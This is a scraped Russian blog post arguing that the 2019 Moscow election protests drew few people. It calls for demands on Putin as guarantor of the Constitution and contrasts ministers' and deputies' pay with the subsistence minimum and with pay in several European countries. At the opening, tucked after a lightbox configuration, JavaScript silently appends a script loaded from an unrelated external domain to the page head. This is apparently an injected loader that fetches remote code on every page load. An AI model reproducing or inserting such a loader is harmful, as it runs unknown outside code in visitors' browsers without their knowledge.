, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
RSS
 

Где активная часть общества?

05 Авг

Требование честных выборов оказалось неспособным призвать хоть сколь-нибудь значительную часть общество на митинги.

Московские протесты, о значении которых  шумела  в интернетах «оппозиция», посетили 3500 человек.

Но в это же время фестиваль шашлыка,  который проходил в Москве,   посетили 305 000 человек.

Смехотворной выглядит сама идея проведения акции с требованием регистрации независимых кандидатов в Мосгордуму.

У этих «независимых» кандидатов, как сообщают https://www.rbc.ru/politics/13/07/2019/5d2a2c939a79476a82de2bd6    СМИ, выявили массу нарушений при исполнении законных  требований  для получения статуса «кандидат».

Фактически идущие законодательствовать, игнорировали порядок получения статус «кандидат» и призывали россиян поддержать их в этом.

Побузить желающих нашлось немного.

Все это свидетельствует о том, что гражданский протест в нашей стране так и не вышел на уровень, который позволил бы осуществляющим государственную власть, считаться с ним.

Как мне представляется, требования протестного движения должны быть  конкретными.

Например,  ненадлежащее исполнение обязанностей гаранта Конституции Владимиром Путиным, проявляющееся в том, что: — Человек, его права и свободы так и не стали высшей ценностью; — не стало обязанностью назначенцев главы государства признание, соблюдение и защита прав и свобод россиян; — Россия не приблизилась к социальному государству, политика которого направлена на создание условий, обеспечивающих достойную жизнь и свободное развитие человека; — в России не установилось правосудие, как вид государственной деятельности, осуществляемой в особом порядке, установленным Конституцией и процессуальным законодательством. Поэтому смысл, содержание и применение законов, деятельность законодательной и исполнительной власти, местного самоуправления и обеспечиваются правосудием.

Кто может поддержать эти вполне конкретные требования к гаранту Конституции?

Прежде всего, россияне с доходами ниже прожиточного минимума. Таковых сегодня  до 20,9 млн человек.

Это, между прочим, больше населения Москвы и Петербурга. Причем, это не бродяги и алкоголики. Они работают, но получают мизерные зарплаты.

По данным Минтруда, за второй квартал 2019 года уровень прожиточного минимума в целом по России установлен в размере 11 185 рублей.

Получается, что зарплата Владимира Путина, установившего прожиточный уровень для россиян,  в 93 раза превышает то, что получают за свой труд почти 21 млн. россиян.

Кроме того, конкретные  требования к гаранту Конституции могут предъявить и пенсионеры.

15 млн. работающих пенсионеров  министр финансов лишил права на индексацию их пенсий, несчитаясь с тем, что они исправно выплачивают в казну все налоги.

Средняя пенсия в России в 2019 году составила 14116 рублей.  Уплата с этой пенсии коммунальных услуг,  уравнивает пенсионеров с теми миллионами россиян, что живут ниже прожиточного минимума.

При этом больше всех в правительстве страны получает  https://versia.ru/minfin-raskryl-zarplaty-federalnyx-ministrov-bolshe-vsex-poluchaet-anton-siluanov   в месяц министр финансов Антон Силуанов, его средняя месячная зарплата — 1,73 миллиона рублей.

Получается, что зарплата Силуанова более, чем в 154 раза превышает установленный правительством страны размер прожиточного минимума.

И если сопоставить эту цифру с данными из декларации (95,4 миллиона рублей), можно увидеть, что зарплата министра  составила примерно пятую часть (22%) от всех доходов министра за 2016 год.

Получается, что почти 80% своих доходов он «зарабатывает» вне работы в правительстве. А, как такое возможно?

Вспомним  министра экономического развития Улюкаева, который при зарплате 10−12 млн. руб. в год, обладал состоянием на сотни миллионов рублей.

Зачем нам такие управленцы, которые, несчитаясь с моралью, международным опытом, намерили себе из бюджета страны, зарплаты в сотни раз превышающие те, что они установили для россиян?

В странах, где  общество активно, где жители  убеждены, что заработная плата депутатов и иных чиновников должна быть тесно связана с зарплатой обычных граждан, мы видим иной порядок распределения благ.

Например, в Польше https://myukraina.com.ua/finansy/zarplata/povyshenie-zarplaty-deputatov-ukrainy-v-2019-godu.html  , депутат получает всего лишь вдвое больше, чем среднестатистический гражданин. Так, если средняя зарплата по стране за 2018-й год составляла 1102 евро, то парламентарии получали по 2230 евро.

При этом депутат не получает бонусов по зарплате, а также  не обеспечивается  жильём, оплачиваемыми помощниками и личным автотранспортом с водителем.

В 2−2,5 раза больше, чем избиратели получают законодатели в:

Финляндии — 6407 евро при середине зарплате — 3380 евро;

Бельгии — 7172 евро при среднестатистическом окладе в стране 3401 евро;

Германии — 9082 евро при других средних окладах 3700 евро;

Даже на  Украине, про бедственное положение которой, нам на всех каналах с утра до ночи рассказывают, депутаты получают  в 4 раза больше, чем другие специалисты отдельных отраслей. При среднестатистической зарплате всего лишь 277 евро, депутат имеет — 1100 евро.

А, что мы видим в России?

Утверждается https://moneyscanner.ru/zarplata-deputata-gosdumy/   , что средняя зарплата депутата Госдумы — 400 тыс. руб. или 5 555 евро.

При этом в государственный бюджет России для содержания одного депутата закладывается полтора миллиона рублей в месяц. Деньги идут на выплату чиновнику жалования, бонусов, а также обеспечения его жильём, помощниками и личным автотранспортом с водителем.

Фактически затраты на одного депутата  в 139 раз превышают установленный в стране прожиточный минимум.

Пора не соучаствовать с оппозиционерами, которые под предлогом служения народу, стремятся приобрести те блага, что сегодня имеют осуществляющие государственную власть, и ещё увеличить их для себя, а каждому россиянину начать предъявлять требования к тем, кто взялся осуществлять государственную власть.

 
Комментариев нет

Автор: ossin Категория: Прочие заметки

 

Оставить комментарий

Вы должны войти, чтобы оставить комментарий.